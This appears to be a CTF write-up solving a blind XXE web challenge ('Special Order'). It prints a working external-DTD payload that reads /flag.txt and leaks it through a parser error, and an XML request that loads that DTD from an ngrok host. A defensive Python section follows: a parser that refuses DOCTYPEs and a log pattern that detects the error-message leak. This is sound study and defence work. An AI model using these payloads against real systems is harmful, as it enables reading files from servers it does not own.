From the clues it is clear this is an old challenge that has been reworked. Searching the keywords "Special Order ctf" turns up this write-up, which shows it is XXE: https://github.com/Ambrotd/hacktivitycon/blob/master/Special%20Order/Special%20Order.md
Googling the full competition name, "special order hacktivitycon", also finds the source code https://github.com/pop-eax/SpecialOrder and the author's blog https://pop-eax.github.io/blog/posts/ctf-writeup/web/2020/08/01/h-cktivitycon-ctf-specialorder/
I poked around for any other place to attack and found none. I tried the original XXE and found the XML is still parsed; it just no longer outputs the result at the end. The more I thought about it, the more something felt off here: if they wanted to fix it, why not remove it entirely? Yet it still parses the XML.
So I went to PortSwigger and saw this page: https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages
One of the techniques there is to use an external DTD to trigger an error, then carry the output out in the error message: https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages
Following what it says, create a new file and host it on a server:
```dtd
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;aaa
```
Then reference that file:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://1101905f73b1.ngrok.io/a.dtd">%xxe; ]>
<root>
  <color>123</color>
  <size>40px</size>
</root>
```
That clears the challenge, and the flag comes back in the error:
```text
Invalid URI: file:///invalid/flag{i7_1s_n0t_s0_bl1nd3721} , line 3, column 7 (a.dtd, line 3)
```
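As an added, defender-side example, not code from the write-up or from the challenge repository: a stdlib-only Python parser for the order document that refuses any DOCTYPE before it is processed, so a hosted DTD is never fetched, plus a log check that flags the "Invalid URI" error shape shown above. The host attacker.example and the flag{placeholder} value are constructed stand-ins, and the benign order form is constructed from the fields in the request above.

```python
import re
import xml.parsers.expat as expat

# Constructed samples: the benign order form, and the same form wrapped in the
# DOCTYPE from the write-up (attacker.example stands in for the real host).
BENIGN_ORDER = (b'<?xml version="1.0" encoding="UTF-8"?>'
                b'<root> <color>123</color> <size>40px</size> </root>')
XXE_ORDER = (b'<?xml version="1.0" encoding="UTF-8"?>'
             b'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.example/a.dtd">%xxe; ]>'
             b'<root> <color>123</color> <size>40px</size> </root>')
SAMPLE_ERROR_LINE = ("Invalid URI: file:///invalid/flag{placeholder} , line 3, "
                     "column 7 (a.dtd, line 3)")  # same shape as the error above

class DTDForbidden(ValueError):
    """The document declared or referenced a DTD or an entity."""

def parse_order(xml_bytes: bytes) -> dict:
    """Parse <root><field>text</field>...</root> into a dict, refusing any DOCTYPE:
    the hosted DTD is then never requested, so neither the file read nor the
    error-message channel can occur."""
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def forbid(*_args):  # raising inside a handler aborts Parse()
        raise DTDForbidden("DOCTYPE and entity declarations are not accepted")
    p.StartDoctypeDeclHandler = forbid  # fires before the internal subset is read
    p.EntityDeclHandler = forbid
    p.ExternalEntityRefHandler = forbid
    fields, path = {}, []
    p.StartElementHandler = lambda name, _attrs: path.append(name)
    p.EndElementHandler = lambda _name: path.pop()
    def on_text(data):  # expat may deliver text in chunks, so append
        if len(path) == 2:  # text of a direct child of <root>
            fields[path[-1]] = fields.get(path[-1], "") + data
    p.CharacterDataHandler = on_text
    p.Parse(xml_bytes, True)
    return fields

def rejects_dtd(xml_bytes: bytes) -> bool:
    # True if parse_order refuses the document because of a DTD or entity.
    try:
        parse_order(xml_bytes)
    except DTDForbidden:
        return True
    return False

# Detection: a parser error that echoes a URI back is the oracle the write-up
# relies on, so flag "Invalid URI: <scheme>://..." lines in application logs.
ERROR_ORACLE = re.compile(r"Invalid URI: (?:file|https?|ftp)://\S*")

def is_error_oracle_line(log_line: str) -> bool:
    return ERROR_ORACLE.search(log_line) is not None
```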